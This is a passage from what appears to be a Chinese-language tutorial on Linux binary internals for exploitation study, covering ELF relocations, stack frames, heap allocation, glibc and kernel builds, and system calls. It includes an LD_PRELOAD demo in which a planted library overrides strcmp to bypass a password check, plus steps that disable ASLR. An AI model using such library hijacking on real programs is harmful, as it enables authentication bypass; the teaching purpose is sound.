  Elf32_Addr    r_offset;       /* Address */
  Elf32_Word    r_info;         /* Relocation type and symbol index */
} Elf32_Rel;

typedef struct
{
  Elf64_Addr    r_offset;       /* Address */
  Elf64_Xword   r_info;         /* Relocation type and symbol index */
  Elf64_Sxword  r_addend;       /* Addend */
} Elf64_Rela;

查看重定位表：

$ readelf -r elfDemo.o

Relocation section '.rel.text' at offset 0x338 contains 9 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
00000008  00001002 R_386_PC32        00000000   __x86.get_pc_thunk.ax
0000000d  0000110a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000019  00000509 R_386_GOTOFF      00000000   .rodata
00000021  00001204 R_386_PLT32       00000000   printf
00000040  00001002 R_386_PC32        00000000   __x86.get_pc_thunk.ax
00000045  0000110a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000052  00000d09 R_386_GOTOFF      00000000   global_init_var
0000005d  00000309 R_386_GOTOFF      00000000   .data
00000068  00000f02 R_386_PC32        00000000   func

Relocation section '.rel.eh_frame' at offset 0x380 contains 3 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
00000020  00000202 R_386_PC32        00000000   .text
00000044  00000202 R_386_PC32        00000000   .text
00000070  00000802 R_386_PC32        00000000   .text.__x86.get_pc_thu

动态链接

动态链接相关的环境变量

动态链接相关的环境变量

LD_PRELOAD

LD_PRELOAD 环境变量可以定义在程序运行前优先加载的动态链接库。这使得我们可以有选择性地加载不同动态链接库中的相同函数，即通过设置该变量，在主程序和其动态链接库中间加载别的动态链接库，甚至覆盖原本的库。这就有可能出现劫持程序执行的安全问题。

#include<stdio.h>
#include<string.h>
void main() {
    char passwd[] = "password";
    char str[128];

    scanf("%s", &str);
    if (!strcmp(passwd, str)) {
        printf("correct\n");
        return;
    }
    printf("invalid\n");
}

下面我们构造一个恶意的动态链接库来重载 strcmp() 函数，编译为动态链接库，并设置 LD_PRELOAD 环境变量：

$ cat hack.c
#include<stdio.h>
#include<stdio.h>
int strcmp(const char *s1, const char *s2) {
    printf("hacked\n");
    return 0;
}
$ gcc -shared -o hack.so hack.c
$ gcc ldpreload.c
$ ./a.out
asdf
invalid
$ LD_PRELOAD="./hack.so" ./a.out
asdf
hacked
correct

LD_SHOW_AUXV

AUXV 是内核在执行 ELF 文件时传递给用户空间的信息，设置该环境变量可以显示这些信息。如：

$ LD_SHOW_AUXV=1 ls
AT_SYSINFO_EHDR: 0x7fff41fbc000
AT_HWCAP:        bfebfbff
AT_PAGESZ:       4096
AT_CLKTCK:       100
AT_PHDR:         0x55f1f623e040
AT_PHENT:        56
AT_PHNUM:        9
AT_BASE:         0x7f277e1ec000
AT_FLAGS:        0x0
AT_ENTRY:        0x55f1f6243060
AT_UID:          1000
AT_EUID:         1000
AT_GID:          1000
AT_EGID:         1000
AT_SECURE:       0
AT_RANDOM:       0x7fff41effbb9
AT_EXECFN:       /usr/bin/ls
AT_PLATFORM:     x86_64

内存管理

什么是内存

为了使用户程序在运行时具有一个私有的地址空间、有自己的 CPU，就像独占了整个计算机一样，现代操作系统提出了虚拟内存的概念。

虚拟内存的主要作用主要为三个：

它将内存看做一个存储在磁盘上的地址空间的高速缓存，在内存中只保存活动区域，并根据需要在磁盘和内存之间来回传送数据。
它为每个进程提供了一致的地址空间。
它保护了每个进程的地址空间不被其他进程破坏。

现代操作系统采用虚拟寻址的方式，CPU 通过生成一个虚拟地址（Virtual Address(VA)）来访问内存，然后这个虚拟地址通过内存管理单元（Memory Management Unit(MMU)）转换成物理地址之后被送到存储器。

前面我们已经看到可执行文件被映射到了内存中，Linux 为每个进程维持了一个单独的虚拟地址空间，包括了 .text、.data、.bss、栈（stack）、堆（heap），共享库等内容。

32 位系统有 4GB 的地址空间，其中 0x08048000~0xbfffffff 是用户空间（3GB），0xc0000000~0xffffffff 是内核空间（１GB）。

栈与调用约定

栈

栈是一个先入后出（First In Last Out(FIFO)）的容器。用于存放函数返回地址及参数、临时变量和有关上下文的内容。程序在调用函数时，操作系统会自动通过压栈和弹栈完成保存函数现场等操作，不需要程序员手动干预。

栈由高地址向低地址增长，栈保存了一个函数调用所需要的维护信息，称为堆栈帧（Stack Frame）在 x86 体系中，寄存器 ebp 指向堆栈帧的底部，esp 指向堆栈帧的顶部。压栈时栈顶地址减小，弹栈时栈顶地址增大。

PUSH：用于压栈。将 esp 减 4，然后将其唯一操作数的内容写入到 esp 指向的内存地址
POP ：用于弹栈。从 esp 指向的内存地址获得数据，将其加载到指令操作数（通常是一个寄存器）中，然后将 esp 加 4。

x86 体系下函数的调用总是这样的：

把所有或一部分参数压入栈中，如果有其他参数没有入栈，那么使用某些特定的寄存器传递。
把当前指令的下一条指令的地址压入栈中。
跳转到函数体执行。

其中第 2 步和第 3 步由指令 call 一起执行。跳转到函数体之后即开始执行函数，而 x86 函数体的开头是这样的：

push ebp：把ebp压入栈中（old ebp）。
mov ebp, esp：ebp=esp（这时ebp指向栈顶，而此时栈顶就是old ebp）
[可选] sub esp, XXX：在栈上分配 XXX 字节的临时空间。
[可选] push XXX：保存名为 XXX 的寄存器。

把ebp压入栈中，是为了在函数返回时恢复以前的ebp值，而压入寄存器的值，是为了保持某些寄存器在函数调用前后保存不变。函数返回时的操作与开头正好相反：

[可选] pop XXX：恢复保存的寄存器。
mov esp, ebp：恢复esp同时回收局部变量空间。
pop ebp：恢复保存的ebp的值。
ret：从栈中取得返回地址，并跳转到该位置。

栈帧对应的汇编代码：

PUSH ebp        ; 函数开始（使用ebp前先把已有值保存到栈中）
MOV ebp, esp    ; 保存当前esp到ebp中

...             ; 函数体
                ; 无论esp值如何变化，ebp都保持不变，可以安全访问函数的局部变量、参数
MOV esp, ebp    ; 将函数的其实地址返回到esp中
POP ebp         ; 函数返回前弹出保存在栈中的ebp值
RET             ; 函数返回并跳转

函数调用后栈的标准布局如下图：

我们来看一个例子：源码

#include<stdio.h>
int add(int a, int b) {
    int x = a, y = b;
    return (x + y);
}

int main() {
    int a = 1, b = 2;
    printf("%d\n", add(a, b));
    return 0;
}

使用 gdb 查看对应的汇编代码，这里我们给出了详细的注释：

gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x00000563 <+0>: lea    ecx,[esp+0x4]                      ;将 esp+0x4 的地址传给 ecx
   0x00000567 <+4>: and    esp,0xfffffff0                     ;栈 16 字节对齐
   0x0000056a <+7>: push   DWORD PTR [ecx-0x4]                ;ecx-0x4，即原 esp 强制转换为双字数据后压入栈中
   0x0000056d <+10>:    push   ebp                              ;保存调用 main() 函数之前的 ebp，由于在 _start 中将 ebp 清零了，这里的 ebp=0x0
   0x0000056e <+11>:    mov    ebp,esp                          ;把调用 main() 之前的 esp 作为当前栈帧的 ebp
   0x00000570 <+13>:    push   ebx                              ;ebx、ecx 入栈
   0x00000571 <+14>:    push   ecx
   0x00000572 <+15>:    sub    esp,0x10                         ;为局部变量 a、b 分配空间并做到 16 字节对齐
   0x00000575 <+18>:    call   0x440 <__x86.get_pc_thunk.bx>    ;调用 <__x86.get_pc_thunk.bx> 函数，将 esp 强制转换为双字数据后保存到 ebx
   0x0000057a <+23>:    add    ebx,0x1a86                       ;ebx+0x1a86
   0x00000580 <+29>:    mov    DWORD PTR [ebp-0x10],0x1         ;a 第二个入栈所以保存在 ebp-0x10 的位置，此句即 a=1
   0x00000587 <+36>:    mov    DWORD PTR [ebp-0xc],0x2          ;b 第一个入栈所以保存在 ebp-0xc 的位置，此句即 b=2
   0x0000058e <+43>:    push   DWORD PTR [ebp-0xc]              ;将 b 压入栈中
   0x00000591 <+46>:    push   DWORD PTR [ebp-0x10]             ;将 a 压入栈中
   0x00000594 <+49>:    call   0x53d <add>                      ;调用 add() 函数，返回值保存在 eax 中
   0x00000599 <+54>:    add    esp,0x8                          ;清理 add() 的参数
   0x0000059c <+57>:    sub    esp,0x8                          ;调整 esp 使 16 位对齐
   0x0000059f <+60>:    push   eax                              ;eax 入栈
   0x000005a0 <+61>:    lea    eax,[ebx-0x19b0]                 ;ebx-0x19b0 的地址保存到 eax，该地址处保存字符串 "%d\n"
   0x000005a6 <+67>:    push   eax                              ;eax 入栈
   0x000005a7 <+68>:    call   0x3d0 <printf@plt>               ;调用 printf() 函数
   0x000005ac <+73>:    add    esp,0x10                         ;调整栈顶指针 esp，清理 printf() 的参数
   0x000005af <+76>:    mov    eax,0x0                          ;eax=0x0
   0x000005b4 <+81>:    lea    esp,[ebp-0x8]                    ;ebp-0x8 的地址保存到 esp
   0x000005b7 <+84>:    pop    ecx                              ;弹栈恢复 ecx、ebx、ebp
   0x000005b8 <+85>:    pop    ebx
   0x000005b9 <+86>:    pop    ebp
   0x000005ba <+87>:    lea    esp,[ecx-0x4]                    ;ecx-0x4 的地址保存到 esp
   0x000005bd <+90>:    ret                                     ;返回，相当于 pop eip;
End of assembler dump.
gdb-peda$ disassemble add
Dump of assembler code for function add:
   0x0000053d <+0>: push   ebp                                ;保存调用 add() 函数之前的 ebp
   0x0000053e <+1>: mov    ebp,esp                            ;把调用 add() 之前的 esp 作为当前栈帧的 ebp
   0x00000540 <+3>: sub    esp,0x10                           ;为局部变量 x、y 分配空间并做到 16 字节对齐
   0x00000543 <+6>: call   0x5be <__x86.get_pc_thunk.ax>      ;调用 <__x86.get_pc_thunk.ax> 函数，将 esp 强制转换为双字数据后保存到 eax
   0x00000548 <+11>:    add    eax,0x1ab8                       ;eax+0x1ab8
   0x0000054d <+16>:    mov    eax,DWORD PTR [ebp+0x8]          ;将 ebp+0x8 的数据 0x1 传送到 eax，ebp+0x4 为函数返回地址
   0x00000550 <+19>:    mov    DWORD PTR [ebp-0x8],eax          ;保存 eax 的值 0x1 到 ebp-0x8 的位置
   0x00000553 <+22>:    mov    eax,DWORD PTR [ebp+0xc]          ;将 ebp+0xc 的数据 0x2 传送到 eax
   0x00000556 <+25>:    mov    DWORD PTR [ebp-0x4],eax          ;保存 eax 的值 0x2 到 ebp-0x4 的位置
   0x00000559 <+28>:    mov    edx,DWORD PTR [ebp-0x8]          ;取出 ebp-0x8 的值 0x1 到 edx
   0x0000055c <+31>:    mov    eax,DWORD PTR [ebp-0x4]          ;取出 ebp-0x4 的值 0x2 到 eax
   0x0000055f <+34>:    add    eax,edx                          ;eax+edx
   0x00000561 <+36>:    leave                                   ;返回，相当于 mov esp,ebp; pop ebp;
   0x00000562 <+37>:    ret
End of assembler dump.

这里我们在 Linux 环境下，由于 ELF 文件的入口其实是 _start 而不是 main()，所以我们还应该关注下面的函数：

gdb-peda$ disassemble _start
Dump of assembler code for function _start:
   0x00000400 <+0>: xor    ebp,ebp                            ;清零 ebp，表示下面的 main() 函数栈帧中 ebp 保存的上一级 ebp 为 0x00000000
   0x00000402 <+2>: pop    esi                                ;将 argc 存入 esi
   0x00000403 <+3>: mov    ecx,esp                            ;将栈顶地址（argv 和 env 数组的其实地址）传给 ecx
   0x00000405 <+5>: and    esp,0xfffffff0                     ;栈 16 字节对齐
   0x00000408 <+8>: push   eax                                ;eax、esp、edx 入栈
   0x00000409 <+9>: push   esp
   0x0000040a <+10>:    push   edx
   0x0000040b <+11>:    call   0x432 <_start+50>                ;先将下一条指令地址 0x00000410 压栈，设置 esp 指向它，再调用 0x00000432 处的指令
   0x00000410 <+16>:    add    ebx,0x1bf0                       ;ebx+0x1bf0
   0x00000416 <+22>:    lea    eax,[ebx-0x19d0]                 ;取 <__libc_csu_fini> 地址传给 eax，然后压栈
   0x0000041c <+28>:    push   eax
   0x0000041d <+29>:    lea    eax,[ebx-0x1a30]                 ;取 <__libc_csu_init> 地址传入 eax，然后压栈
   0x00000423 <+35>:    push   eax
   0x00000424 <+36>:    push   ecx                              ;ecx、esi 入栈保存
   0x00000425 <+37>:    push   esi
   0x00000426 <+38>:    push   DWORD PTR [ebx-0x8]              ;调用 main() 函数之前保存返回地址，其实就是保存 main() 函数的入口地址
   0x0000042c <+44>:    call   0x3e0 <__libc_start_main@plt>    ;call 指令调用 __libc_start_main 函数
   0x00000431 <+49>:    hlt                                     ;hlt 指令使程序停止运行，处理器进入暂停状态，不执行任何操作，不影响标志。当 RESET 线上有复位信号、CPU 响应非屏蔽终端、CPU 响应可屏蔽终端 3 种情况之一时，CPU 脱离暂停状态，执行下一条指令
   0x00000432 <+50>:    mov    ebx,DWORD PTR [esp]              ;esp 强制转换为双字数据后保存到 ebx
   0x00000435 <+53>:    ret                                     ;返回，相当于 pop eip;
   0x00000436 <+54>:    xchg   ax,ax                            ;交换 ax 和 ax 的数据，相当于 nop
   0x00000438 <+56>:    xchg   ax,ax
   0x0000043a <+58>:    xchg   ax,ax
   0x0000043c <+60>:    xchg   ax,ax
   0x0000043e <+62>:    xchg   ax,ax
End of assembler dump.

函数调用约定

函数调用约定是对函数调用时如何传递参数的一种约定。调用函数前要先把参数压入栈然后再传递给函数。

一个调用约定大概有如下的内容：

函数参数的传递顺序和方式
栈的维护方式
名字修饰的策略

主要的函数调用约定如下，其中 cdecl 是 C 语言默认的调用约定：

调用约定	出栈方	参数传递	名字修饰
cdecl	函数调用方	从右到左的顺序压参数入栈	下划线＋函数名
stdcall	函数本身	从右到左的顺序压参数入栈	下划线＋函数名＋@＋参数的字节数
fastcall	函数本身	都两个 DWORD（4 字节）类型或者占更少字节的参数被放入寄存器，其他剩下的参数按从右到左的顺序压入栈	@＋函数名＋@＋参数的字节数

除了参数的传递之外，函数与调用方还可以通过返回值进行交互。当返回值不大于 4 字节时，返回值存储在 eax 寄存器中，当返回值在 5~8 字节时，采用 eax 和 edx 结合的形式返回，其中 eax 存储低 4 字节， edx 存储高 4 字节。

堆与内存管理

堆

堆是用于存放除了栈里的东西之外所有其他东西的内存区域，有动态内存分配器负责维护。分配器将堆视为一组不同大小的块（block）的集合来维护，每个块就是一个连续的虚拟内存器片（chunk）。当使用 malloc() 和 free() 时就是在操作堆中的内存。对于堆来说，释放工作由程序员控制，容易产生内存泄露。

堆是向高地址扩展的数据结构，是不连续的内存区域。这是由于系统是用链表来存储的空闲内存地址的，而链表的遍历方向是由低地址向高地址。堆的大小受限于计算机系统中有效的虚拟内存。由此可见，堆获得的空间比较灵活，也比较大。

如果每次申请内存时都直接使用系统调用，会严重影响程序的性能。通常情况下，运行库先向操作系统“批发”一块较大的堆空间，然后“零售”给程序使用。当全部“售完”之后或者剩余空间不能满足程序的需求时，再根据情况向操作系统“进货”。

进程堆管理

Linux 提供了两种堆空间分配的方式，一个是 brk() 系统调用，另一个是 mmap() 系统调用。可以使用 man brk、man mmap 查看。

brk() 的声明如下：

#include <unistd.h>

int brk(void *addr);

void *sbrk(intptr_t increment);

参数 *addr 是进程数据段的结束地址，brk() 通过改变该地址来改变数据段的大小，当结束地址向高地址移动，进程内存空间增大，当结束地址向低地址移动，进程内存空间减小。brk()调用成功时返回 0，失败时返回 -1。 sbrk() 与 brk() 类似，但是参数 increment 表示增量，即增加或减少的空间大小，调用成功时返回增加后减小前数据段的结束地址，失败时返回 -1。

在上图中我们看到 brk 指示堆结束地址，start_brk 指示堆开始地址。BSS segment 和 heap 之间有一段 Random brk offset，这是由于 ASLR 的作用，如果关闭了 ASLR，则 Random brk offset 为 0，堆结束地址和数据段开始地址重合。

例子：源码

#include <stdio.h>
#include <unistd.h>
void main() {
        void *curr_brk, *tmp_brk, *pre_brk;

        printf("当前进程 PID：%d\n", getpid());

        tmp_brk = curr_brk = sbrk(0);
        printf("初始化后的结束地址：%p\n", curr_brk);
        getchar();

        brk(curr_brk+4096);
        curr_brk = sbrk(0);
        printf("brk 之后的结束地址：%p\n", curr_brk);
        getchar();

        pre_brk = sbrk(4096);
        curr_brk = sbrk(0);
        printf("sbrk 返回值（即之前的结束地址）：%p\n", pre_brk);
        printf("sbrk 之后的结束地址：%p\n", curr_brk);
        getchar();

        brk(tmp_brk);
        curr_brk = sbrk(0);
        printf("恢复到初始化时的结束地址：%p\n", curr_brk);
        getchar();
}

开启两个终端，一个用于执行程序，另一个用于观察内存地址。首先我们看关闭了 ASLR 的情况。第一步初始化：

# echo 0 > /proc/sys/kernel/randomize_va_space
$ ./a.out
当前进程 PID：27759
初始化后的结束地址：0x56579000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506                           /home/a.out
56558000-56579000 rw-p 00000000 00:00 0                                  [heap]
...

数据段结束地址和堆开始地址同为 0x56558000，堆结束地址为 0x56579000。

第二步使用 brk() 增加堆空间：

$ ./a.out
当前进程 PID：27759
初始化后的结束地址：0x56579000

brk 之后的结束地址：0x5657a000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506                           /home/a.out
56558000-5657a000 rw-p 00000000 00:00 0                                  [heap]
...

堆开始地址不变，结束地址增加为 0x5657a000。

第三步使用 sbrk() 增加堆空间：

$ ./a.out
当前进程 PID：27759
初始化后的结束地址：0x56579000

brk 之后的结束地址：0x5657a000

sbrk 返回值（即之前的结束地址）：0x5657a000
sbrk 之后的结束地址：0x5657b000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506                           /home/a.out
56558000-5657b000 rw-p 00000000 00:00 0                                  [heap]
...

第四步减小堆空间：

$ ./a.out
当前进程 PID：27759
初始化后的结束地址：0x56579000

brk 之后的结束地址：0x5657a000

sbrk 返回值（即之前的结束地址）：0x5657a000
sbrk 之后的结束地址：0x5657b000

恢复到初始化时的结束地址：0x56579000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506                           /home/a.out
56558000-56579000 rw-p 00000000 00:00 0                                  [heap]
...

再来看一下开启了 ASLR 的情况：

# echo 2 > /proc/sys/kernel/randomize_va_space
$ ./a.out
当前进程 PID：28025
初始化后的结束地址：0x578ad000
# cat /proc/28025/maps
...
5663f000-56640000 rw-p 00001000 08:01 28587506                           /home/a.out
5788c000-578ad000 rw-p 00000000 00:00 0                                  [heap]
...

可以看到这时数据段的结束地址 0x56640000 不等于堆的开始地址 0x5788c000。

mmap() 的声明如下：

#include <sys/mman.h>

void *mmap(void *addr, size_t len, int prot, int flags,
    int fildes, off_t off);

mmap() 函数用于创建新的虚拟内存区域，并将对象映射到这些区域中，当它不将地址空间映射到某个文件时，我们称这块空间为匿名（Anonymous）空间，匿名空间可以用来作为堆空间。mmap() 函数要求内核创建一个从地址 addr 开始的新虚拟内存区域，并将文件描述符 fildes 指定的对象的一个连续的片（chunk）映射到这个新区域。连续的对象片大小为 len 字节，从距文件开始处偏移量为 off 字节的地方开始。prot 描述虚拟内存区域的访问权限位，flags 描述被映射对象类型的位组成。

munmap() 则用于删除虚拟内存区域：

#include <sys/mman.h>

int munmap(void *addr, size_t len);

例子：源码

#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
void main() {
    void *curr_brk;

    printf("当前进程 PID：%d\n", getpid());
    printf("初始化后\n");
    getchar();

    char *addr;
    addr = mmap(NULL, (size_t)4096, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    printf("mmap 完成\n");
    getchar();

    munmap(addr, (size_t)4096);
    printf("munmap 完成\n");
    getchar();
}

第一步初始化：

$ ./a.out
当前进程 PID：28652
初始化后
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ef000-f76f1000 rw-p 00000000 00:00 0
...

第二步 mmap：

]$ ./a.out
当前进程 PID：28652
初始化后
mmap 完成
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ee000-f76f1000 rw-p 00000000 00:00 0
...

第三步 munmap：

$ ./a.out
当前进程 PID：28652
初始化后
mmap 完成
munmap 完成
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ef000-f76f1000 rw-p 00000000 00:00 0
...

可以看到第二行第一列地址从 f76ef000->f76ee000->f76ef000 变化。0xf76ee000-0xf76ef000=0x1000=4096。

通常情况下，我们不会直接使用 brk() 和 mmap() 来分配堆空间，C 标准库提供了一个叫做 malloc 的分配器，程序通过调用 malloc() 函数来从堆中分配块，声明如下：

#include <stdlib.h>

void *malloc(size_t size);
void free(void *ptr);
void *calloc(size_t nmemb, size_t size);
void *realloc(void *ptr, size_t size);

示例：

#include<stdio.h>
#include<malloc.h>
void foo(int n) {
    int *p;
    p = (int *)malloc(n * sizeof(int));

    for (int i=0; i<n; i++) {
        p[i] = i;
        printf("%d ", p[i]);
    }
    printf("\n");

    free(p);
}

void main() {
    int n;
    scanf("%d", &n);

    foo(n);
}

运行结果：

$ ./malloc
4
0 1 2 3
$ ./malloc
8
0 1 2 3 4 5 6 7
$ ./malloc
16
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

使用 gdb 查看反汇编代码：

gdb-peda$ disassemble foo
Dump of assembler code for function foo:
   0x0000066d <+0>:     push   ebp
   0x0000066e <+1>:     mov    ebp,esp
   0x00000670 <+3>:     push   ebx
   0x00000671 <+4>:     sub    esp,0x14
   0x00000674 <+7>:     call   0x570 <__x86.get_pc_thunk.bx>
   0x00000679 <+12>:    add    ebx,0x1987
   0x0000067f <+18>:    mov    eax,DWORD PTR [ebp+0x8]
   0x00000682 <+21>:    shl    eax,0x2
   0x00000685 <+24>:    sub    esp,0xc
   0x00000688 <+27>:    push   eax
   0x00000689 <+28>:    call   0x4e0 <malloc@plt>
   0x0000068e <+33>:    add    esp,0x10
   0x00000691 <+36>:    mov    DWORD PTR [ebp-0xc],eax
   0x00000694 <+39>:    mov    DWORD PTR [ebp-0x10],0x0
   0x0000069b <+46>:    jmp    0x6d9 <foo+108>
   0x0000069d <+48>:    mov    eax,DWORD PTR [ebp-0x10]
   0x000006a0 <+51>:    lea    edx,[eax*4+0x0]
   0x000006a7 <+58>:    mov    eax,DWORD PTR [ebp-0xc]
   0x000006aa <+61>:    add    edx,eax
   0x000006ac <+63>:    mov    eax,DWORD PTR [ebp-0x10]
   0x000006af <+66>:    mov    DWORD PTR [edx],eax
   0x000006b1 <+68>:    mov    eax,DWORD PTR [ebp-0x10]
   0x000006b4 <+71>:    lea    edx,[eax*4+0x0]
   0x000006bb <+78>:    mov    eax,DWORD PTR [ebp-0xc]
   0x000006be <+81>:    add    eax,edx
   0x000006c0 <+83>:    mov    eax,DWORD PTR [eax]
   0x000006c2 <+85>:    sub    esp,0x8
   0x000006c5 <+88>:    push   eax
   0x000006c6 <+89>:    lea    eax,[ebx-0x17e0]
   0x000006cc <+95>:    push   eax
   0x000006cd <+96>:    call   0x4b0 <printf@plt>
   0x000006d2 <+101>:   add    esp,0x10
   0x000006d5 <+104>:   add    DWORD PTR [ebp-0x10],0x1
   0x000006d9 <+108>:   mov    eax,DWORD PTR [ebp-0x10]
   0x000006dc <+111>:   cmp    eax,DWORD PTR [ebp+0x8]
   0x000006df <+114>:   jl     0x69d <foo+48>
   0x000006e1 <+116>:   sub    esp,0xc
   0x000006e4 <+119>:   push   0xa
   0x000006e6 <+121>:   call   0x500 <putchar@plt>
   0x000006eb <+126>:   add    esp,0x10
   0x000006ee <+129>:   sub    esp,0xc
   0x000006f1 <+132>:   push   DWORD PTR [ebp-0xc]
   0x000006f4 <+135>:   call   0x4c0 <free@plt>
   0x000006f9 <+140>:   add    esp,0x10
   0x000006fc <+143>:   nop
   0x000006fd <+144>:   mov    ebx,DWORD PTR [ebp-0x4]
   0x00000700 <+147>:   leave  
   0x00000701 <+148>:   ret
End of assembler dump.

关于 glibc 中的 malloc 实现是一个很重要的话题，我们会在后面的章节详细介绍。

glibc malloc

下载文件

glibc

这一章中，我们将阅读分析 glibc 的源码，下面先把它下载下来，并切换到我们需要的版本：

$ git clone git://sourceware.org/git/glibc.git
$ cd glibc
$ git checkout --track -b local_glibc-2.23 origin/release/2.23/master

下面来编译它，首先修改配置文件 Makeconfig，将 -Werror 注释掉，这样可以避免高版本 GCC（v8.1.0）将警告当做错误处理：

$ cat Makeconfig | grep -i werror | grep warn
+gccwarn += #-Werror

接下来需要打上一个 patch：

$ cat regexp.patch
diff --git a/misc/regexp.c b/misc/regexp.c
index 19d76c0..9017bc1 100644
--- a/misc/regexp.c
+++ b/misc/regexp.c
@@ -29,14 +29,17 @@

 #if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_23)

-/* Define the variables used for the interface.  */
-char *loc1;
-char *loc2;
+#include <stdlib.h>    /* Get NULL.  */
+
+/* Define the variables used for the interface.  Avoid .symver on common
+   symbol, which just creates a new common symbol, not an alias.  */
+char *loc1 = NULL;
+char *loc2 = NULL;
 compat_symbol (libc, loc1, loc1, GLIBC_2_0);
 compat_symbol (libc, loc2, loc2, GLIBC_2_0);

 /* Although we do not support the use we define this variable as well.  */
-char *locs;
+char *locs = NULL;
 compat_symbol (libc, locs, locs, GLIBC_2_0);
$ patch misc/regexp.c regexp.patch

然后就可以编译了：

$ mkdir build && cd build
$ ../configure --prefix=/usr/local/glibc-2.23
$ make -j4 && sudo make install

如果我们想要在编译程序时指定 libc，可以像这样：

$ gcc -L/usr/local/glibc-2.23/lib -Wl,--rpath=/usr/local/glibc-2.23/lib -Wl,-I/usr/local/glibc-2.23/lib/ld-2.23.so test.c
$ ldd a.out
        linux-vdso.so.1 (0x00007ffcc76b0000)
        libc.so.6 => /usr/local/glibc-2.23/lib/libc.so.6 (0x00007f6abd578000)
        /usr/local/glibc-2.23/lib/ld-2.23.so => /usr/lib64/ld-linux-x86-64.so.2 (0x00007f6abdb1c000)

然后如果希望在调试时指定 libc 的源文件，可以使用 gdb 命令 directory，但是这种方法的缺点是不能解析子目录，所以推荐使用下面的命令在启动时加载：

gdb `find ~/path/to/glibc/source -type d -printf '-d %p '` ./a.out

malloc.c

下面我们先分析 glibc 2.23 版本的源码，它是 Ubuntu16.04 的默认版本，在 pwn 中也最常见。然后，我们再探讨新版本的 glibc 中所加入的漏洞缓解机制。

分配函数

_int_malloc()

释放函数

_int_free()

重分配函数

_int_realloc()

Linux 内核

编译安装

我的编译环境是如下。首先安装必要的软件：

$ uname -a
Linux firmy-pc 4.14.34-1-MANJARO #1 SMP PREEMPT Thu Apr 12 17:26:43 UTC 2018 x86_64 GNU/Linux
$ yaourt -S base-devel

为了方便学习，选择一个稳定版本，比如最新的 4.16.3。

$ mkdir ~/kernelbuild && cd ~/kernelbuild
$ wget -c https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.16.3.tar.xz
$ tar -xvJf linux-4.16.3.tar.xz
$ cd linux-4.16.3/
$ make clean && make mrproper

内核的配置选项在 .config 文件中，有两种方法可以设置这些选项，一种是从当前内核中获得一份默认配置：

$ zcat /proc/config.gz > .config
$ make oldconfig

另一种是自己生成一份配置：

$ make localmodconfig   # 使用当前内核配置生成
    # OR
$ make defconfig        # 根据当前架构默认的配置生成

为了能够对内核进行调试，需要设置下面的参数：

CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_INFO_REDUCED=n
CONFIG_GDB_SCRIPTS=y

如果需要使用 kgdb，还需要开启下面的参数：

CONFIG_STRICT_KERNEL_RWX=n
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y

CONFIG_STRICT_KERNEL_RWX 会将特定的内核内存空间标记为只读，这将阻止你使用软件断点，最好将它关掉。如果希望使用 kdb，在上面的基础上再加上：

CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y

另外如果你在调试时不希望被 KASLR 干扰，可以在编译时关掉它：

CONFIG_RANDOMIZE_BASE=n
CONFIG_RANDOMIZE_MEMORY=n

将上面的参数写到文件 .config-fragment，然后合并进 .config：

$ ./scripts/kconfig/merge_config.sh .config .config-fragment

最后因为内核编译默认开启了 -O2 优化，可以修改 Makefile 为 -O0：

KBUILD_CFLAGS   += -O0

编译内核：

$ make

完成后当然就是安装，但我们这里并不是真的要将本机的内核换掉，接下来的过程就交给 QEMU 了。（参考章节4.1）

系统调用

在 Linux 中，系统调用是一些内核空间函数，是用户空间访问内核的唯一手段。这些函数与 CPU 架构有关，x86-64 架构提供了 322 个系统调用，x86 提供了 358 个系统调用（参考附录9.4）。

下面是一个用 32 位汇编写的例子，源码：

.data

msg:
    .ascii "hello 32-bit!\n"
    len = . - msg

.text
    .global _start

_start:
    movl $len, %edx
    movl $msg, %ecx
    movl $1, %ebx
    movl $4, %eax
    int $0x80

    movl $0, %ebx
    movl $1, %eax
    int $0x80

编译执行（可以编译成64位程序的）：

$ gcc -m32 -c hello32.S
$ ld -m elf_i386 -o hello32 hello32.o
$ strace ./hello32
execve("./hello32", ["./hello32"], 0x7ffff990f830 /* 68 vars */) = 0
strace: [ Process PID=19355 runs in 32 bit mode. ]
write(1, "hello 32-bit!\n", 14hello 32-bit!
)         = 14
exit(0)                                 = ?
+++ exited with 0 +++

可以看到程序将调用号保存到 eax，并通过 int $0x80 来使用系统调用。

虽然软中断 int 0x80 非常经典，早期 2.6 及以前版本的内核都使用这种机制进行系统调用。但因其性能较差，在往后的内核中使用了快速系统调用指令来替代，32 位系统使用 sysenter（对应sysexit）指令，而 64 位系统使用 syscall（对应sysret）指令。

一个使用 sysenter 的例子：

.data

msg:
    .ascii "Hello sysenter!\n"
    len = . - msg

.text
    .globl _start

_start:
    movl $len, %edx
    movl $msg, %ecx
    movl $1, %ebx
    movl $4, %eax
    # Setting the stack for the systenter
    pushl $sysenter_ret
    pushl %ecx
    pushl %edx
    pushl %ebp
    movl %esp, %ebp
    sysenter

sysenter_ret:
    movl $0, %ebx
    movl $1, %eax
    # Setting the stack for the systenter
    pushl $sysenter_ret
    pushl %ecx
    pushl %edx
    pushl %ebp
    movl %esp, %ebp
    sysenter
$ gcc -m32 -c sysenter.S
$ ld -m elf_i386 -o sysenter sysenter.o
$ strace ./sysenter
execve("./sysenter", ["./sysenter"], 0x7fff73993fd0 /* 69 vars */) = 0
